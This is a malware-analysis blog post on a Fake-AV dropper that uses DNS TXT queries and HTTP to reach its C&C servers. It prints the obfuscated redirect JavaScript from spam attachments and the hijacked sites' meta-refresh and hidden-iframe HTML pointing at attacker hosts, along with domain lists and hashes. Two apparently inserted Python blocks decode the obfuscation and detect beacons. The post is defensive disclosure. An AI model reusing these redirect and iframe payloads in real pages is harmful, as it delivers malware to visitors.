
New Dropper Uses DNS To Communicate

During the last few weeks I have been monitoring a new dropper which uses DNS and HTTP in combination to communicate with its Command&Control server (C&C).

I first saw the Trojan on 2010-06-08, being dropped by a well-known exploit kit called NeoSploit. The AV detection rate is pretty good: most AV vendors currently detect the binaries used to spread the Trojan as Fake-AV. As far as I have seen, this Trojan is just a dropper which installs additional Fake-AV software.

Back in June, when I first saw the Trojan, I added a signature to AMaDa. AMaDa therefore tags the binaries and URLs associated with this Trojan as DNSTrojan.

In September 2010 I saw a peak in new URLs propagating DNSTrojan on AMaDa:

Over the past days I have seen dozens of domain names popping up which are being used to spread the Trojan (using drive-by exploits). Here are some of them:

hezhett.co.cc
hezhexh.co.cc
hezhlhe.co.cc
hezhthu.co.cc
hezlhez.co.cc
hezlhhh.co.cc
hhehshe.co.cc
hheuhhh.co.cc
hhezhez.co.cc
hutahhe.co.cc
hzthezh.co.cc
scaner-ap.cz.cc
scaner-as.cz.cc
scaner-anti.cz.cc
scaner-all.cz.cc
scaner-add.cz.cc
scaner-ac2.cz.cc
scaner-access.cz.cc
scaner-acea.cz.cc
scaner-aced.cz.cc
scaner-acef.cz.cc
scaner-acer.cz.cc
scaner-dual.cz.cc
scaner-fast.cz.cc
scaner-g.cz.cc
scaner-gammi.cz.cc
scaner-go.cz.cc
scaner-h.cz.cc
scaner-hello.cz.cc
scaner-high.cz.cc
scaner-i.cz.cc
scaner-idea.cz.cc
scaner-internet.cz.cc
scaner-ip.cz.cc

As already mentioned, the Trojan is only used to drop Fake-AV software. So far I have identified the following domain names associated with this Fake-AV campaign:

desktopsecurity2010soft.com
desktopsecuritycorp.com
desktopsecurityorg.com
desktopsecuritysoft2010.com
desktopsecuritysolution.com
desktopsecuritytech2010.com
securitysoftware2010tech.com
securitysoftwaretech2010ltd.com

*** Spam Mails propagating the DNSTrojan ***

This week I found dozens of spam mails in my honeypots which had an HTML file attached. Some of the subjects I have seen so far are:

  • Consultation Appointment
  • Questions
  • Outstanding invoice – 9386 Ltd
  • Nivea commercial payment
  • Appraisal – Killington $155000
  • Re: GO HOME + SHE SAID / 4.3.2.1./
  • Transaction Breakdown
  • Offer on Killington
  • Fwd: Addendum to extend close of escrow!
  • Signatures to Intercreditor
  • demands for payment
  • Mortgage Breakdown PITI
  • notes from last week
  • and many more…

The HTML files attached to all those spam mails contain JavaScript code:

<script type='text/javascript'>
<!--
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m="";
for (i=0; i<s.length; i++) {
    if (s.charCodeAt(i) == 28) {
        m += '&';
    } else if (s.charCodeAt(i) == 23) {
        m += '!';
    } else {
        m += String.fromCharCode(s.charCodeAt(i)-1);
    }
}
document.write(m);
//-->
</script>

Hum? Obfuscated JavaScript code. Decoding it yields the following HTML code:

<meta http-equiv="refresh" content="0;url=http://blacklefilm.com/x.html" />
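The obfuscation above is a plain character shift: every character is emitted with its code minus one, and the two codes 28 and 23 are mapped to '&' and '!'. Below is an added example (not code from the original post or from AMaDa) that reimplements this decoding in Python, so an analyst can recover the redirect target from such an attachment without rendering the HTML or executing the script. The helper names and the regular expressions are my own; the obfuscated string is the one from the sample above.

```python
"""Decode the character-shift obfuscation used in the spam attachment (added example)."""
import re

# The obfuscated payload exactly as it appears in the attachment shown above.
SAMPLE = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?"

# Hypothetical helper pattern: pulls the var s="..." literal out of the script.
VAR_S = re.compile(r'var\s+s\s*=\s*"([^"]*)"')
# Hypothetical helper pattern: the url= target of a <meta http-equiv="refresh"> tag.
META_REFRESH = re.compile(
    r'http-equiv=["\']refresh["\'][^>]*content=["\'][^"\']*?url=([^"\'\s]+)',
    re.IGNORECASE,
)


def decode_shift(s: str) -> str:
    """Mirror the JavaScript loop: code 28 -> '&', code 23 -> '!', otherwise code - 1.

    The & 0xFFFF reproduces String.fromCharCode's 16-bit truncation, so the
    function never raises on an input code point of zero.
    """
    out = []
    for ch in s:
        code = ord(ch)
        if code == 28:
            out.append("&")
        elif code == 23:
            out.append("!")
        else:
            out.append(chr((code - 1) & 0xFFFF))
    return "".join(out)


def decode_attachment(script_text: str):
    """Locate the var s="..." payload in an attachment and decode it; None if absent."""
    m = VAR_S.search(script_text)
    return decode_shift(m.group(1)) if m else None


def extract_refresh_url(html: str):
    """Return the redirect target of a meta refresh tag, or None if there is none."""
    m = META_REFRESH.search(html)
    return m.group(1) if m else None


if __name__ == "__main__":
    decoded = decode_shift(SAMPLE)
    print(decoded)                      # the <meta http-equiv="refresh"> tag
    print(extract_refresh_url(decoded))  # the URL the victim would be sent to
```

Because the decoded document is only ever inspected as a string, the redirect is never followed; the extracted URL can be fed straight into a blocklist or a sandbox queue.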

The JavaScript code embedded in the malicious attachment redirects the victim to a hijacked website, which displays the following message in the web browser:

So far I have seen the following hijacked websites involved in this spam campaign:

blacklefilm.com/x.html
chautoy.co.za/x.html
numerouno-india.com/x.html
universelles.com/x.html
gvperkins.com/x.html
nobletree.org/x.html
turksagliksen.org.tr/x.html
acquaintive.in/x.html
hesswoodrecycling.com/x.html
equus-ing.com.ar/x.html
barrhavenbia.ca/x.html
annechristene.com/x.html
www.mindconnect.nl/x.html
meltemtvreklam.com/x.html
cernoma.com/x.html
chautoy.co.za/x.html
firstchurchofgodkokomo.org/x.htm
euroiris.cz/x.html

The hijacked website tries to do two things:

  1. Install the ZeuS banking Trojan using drive-by exploits (see AMaDa)
  2. Redirect the victim once again, to a site controlled by the cybercriminals, which distributes DNSTrojan

The HTML source code of the hijacked websites (x.html) looks like this:

<meta http-equiv="refresh" content="4;url=http://lausakizse.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="http://wedubud.co.cc/ajax/?db=img&showtopic=11ss&last=redirect& [...]"></iframe>

Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to convince the victim that his computer is infected with malware and offers him a malicious EXE file:

The binary served by those websites contains the DNSTrojan and is detected as "Fake-AV" by most AV vendors:

Filename: antivirus.exe
File size: 169984 bytes
MD5: a00b75b0d43702d4b099548b90c715c7
SHA1: 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33/43 (76.7%)

As of 2010-09-21 19:00 UTC, the spam campaign is still going on.

*** The DNSTrojan ***

Let's take a closer look at the Trojan being dropped. The Trojan installs itself into the following directories:

c:\program files\common files\microsoft shared\web folders\servemonsonsext.exe
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c:\program files\common files\microsoft shared\TextConv\quillmsconv97.exe

Note that the file names used by the Trojan vary. Additionally, the Trojan has an interesting behavior when Apple QuickTime is installed on the victim's computer: it installs itself into the QuickTime directory:

c:\program files\quicktime\pictureviewer.resources\nl.lproj\quicktimequicktime.exe
c:\program files\apple software update\softwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c:\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe

In the next step the Trojan contacts its first Command&Control server, located at httpdsconfig.com. The interesting thing is that in this first stage the Trojan uses DNS instead of HTTP to communicate with the C&C:

Standard query TXT 1284891734.httpdsconfig.com
Standard query response TXT

The Trojan issues a DNS TXT query to httpdsconfig.com every few minutes, using the current UNIX timestamp as the subdomain (*unixtimestamp*.httpdsconfig.com). The C&C server replies with an encrypted string (which seems to be always the same):

$ dig 1284215737.httpdsconfig.com TXT +short
"a0dfe9b34e6c3bc167fc890a20dc283ab8c397eed489f2f737
efceb0064fbba77dc71472b59dde25a2f6f1883ffdc3b1f5ec9
1caf610f02c3b85e8cb831f81e554a83706c8849dd4cfa9ef0c
205c87f5e93f7a5323e71e35d566fe9fc8916717f69304"
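The beacon pattern described above (a TXT query whose leftmost label is the current UNIX timestamp, repeated every few minutes) is something a resolver log can be searched for. The following is an added example, not code from the original post or from AMaDa, that scans a simple DNS query log for two signals: queries to the C&C domain named in this post, and TXT queries to any domain whose first label is a 10-digit epoch close to the time the query was logged. The log format (epoch, client, query type, query name, whitespace separated) and the sample lines are constructed for this example; parse_line() is the only function that needs adapting to a real resolver's format.

```python
"""Flag <unix-timestamp>.<domain> TXT beacons in a DNS query log (added example)."""
import re
import statistics
from collections import defaultdict

# The DNS-stage C&C domain named in the post.
KNOWN_C2 = {"httpdsconfig.com"}
TS_LABEL = re.compile(r"^\d{10}$")

# Constructed sample log: epoch, client IP, qtype, qname.
# 10.0.0.5 beacons to the known C&C, 10.0.0.7 beacons to a domain we have never
# seen (beacon-test.example is a placeholder), 10.0.0.9 merely resolves the C&C
# domain, and 10.0.0.11's label is not a plausible current timestamp.
SAMPLE_LOG = """
1284891734 10.0.0.5 TXT 1284891734.httpdsconfig.com
1284891740 10.0.0.5 A www.example.com
1284891920 10.0.0.5 TXT 1284891920.httpdsconfig.com
1284892100 10.0.0.5 TXT 1284892100.httpdsconfig.com
1284892105 10.0.0.7 TXT _dmarc.example.org
1284892110 10.0.0.7 TXT 1284892110.beacon-test.example
1284892200 10.0.0.9 A httpdsconfig.com
1284892300 10.0.0.7 TXT 1284892300.beacon-test.example
1284892500 10.0.0.7 TXT 1284892500.beacon-test.example
1284892600 10.0.0.11 TXT 9999999999.beacon-test.example
"""


def parse_line(line):
    """Return (epoch, client, qtype, qname) or None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        return int(parts[0]), parts[1], parts[2].upper(), parts[3].rstrip(".").lower()
    except ValueError:
        return None


def registered_domain(qname):
    """Crude eTLD+1 (last two labels). Fine for .com/.in; a public-suffix list is
    needed for names under co.cc, cz.cc and similar."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def timestamp_label(qname, seen_at, tolerance=3600):
    """True if the leftmost label is a 10-digit epoch within `tolerance` seconds
    of the time the query was logged (rules out random numeric labels)."""
    first = qname.split(".", 1)[0]
    return bool(TS_LABEL.match(first)) and abs(int(first) - seen_at) <= tolerance


def detect(lines, min_beacons=3):
    """Return one alert per (client, domain) that either touches a known C&C domain
    or sends at least `min_beacons` timestamp-labelled TXT queries to one domain."""
    reasons = defaultdict(set)    # (client, domain) -> set of reason strings
    beacons = defaultdict(list)   # (client, domain) -> log times of beacon queries
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        epoch, client, qtype, qname = rec
        key = (client, registered_domain(qname))
        if key[1] in KNOWN_C2:
            reasons[key].add("known DNSTrojan C2 domain")
        if qtype == "TXT" and timestamp_label(qname, epoch):
            beacons[key].append(epoch)

    alerts = []
    for key in sorted(set(reasons) | set(beacons)):
        times = sorted(beacons.get(key, []))
        median_gap = None
        if len(times) >= min_beacons:
            gaps = [b - a for a, b in zip(times, times[1:])]
            median_gap = statistics.median(gaps)   # typical beacon interval in seconds
            reasons[key].add("timestamped TXT beacon")
        if not reasons[key]:
            continue   # too few beacons and not a known domain: no alert
        alerts.append({
            "client": key[0],
            "domain": key[1],
            "reasons": sorted(reasons[key]),
            "beacon_count": len(times),
            "median_interval": median_gap,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.strip().splitlines()):
        print(alert)
```

The timestamp heuristic is deliberately independent of the domain list, so it keeps working when the C&C moves to a new domain; the tolerance window and min_beacons threshold are the knobs to tune against your own log volume.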

Afterwards the Trojan resolves the domain name desktopsecuritysolutionnew.com and contacts a second C&C server located at httpsxy.in. This time the Trojan uses HTTP to communicate with the C&C:

GET /httpss/v=&step=2&hostid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: httpsxy.in

The C&C server answers with an HTTP 404 (Not Found), but the response contains encrypted data anyway. I assume the cybercriminals do this to fool security researchers and IDS/IPS:

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

*encrypted-data*

Last but not least, the Trojan queries a third C&C server located at httpsbee.in every 30 seconds:

GET /getfile.php?r=XXXX&p= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: httpsbee.in

Note that the p parameter is a base64-encoded string containing the values "MACHINE", "OP" and "TRK".

*** Conclusion ***

  • The Trojan is pretty new (first seen in June 2010)
  • The detection rate on the Trojan binaries is currently pretty good
  • The Trojan uses DNS and HTTP to communicate with the C&C
  • The Trojan drops Fake-AV software (using "getfile.php")

I recommend blocking access to the following domain names, which are associated with DNSTrojan:

httpdsconfig.com (204.12.223.190 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsbee.in (204.12.223.186 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsxy.in (69.197.147.188 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpssite.in -
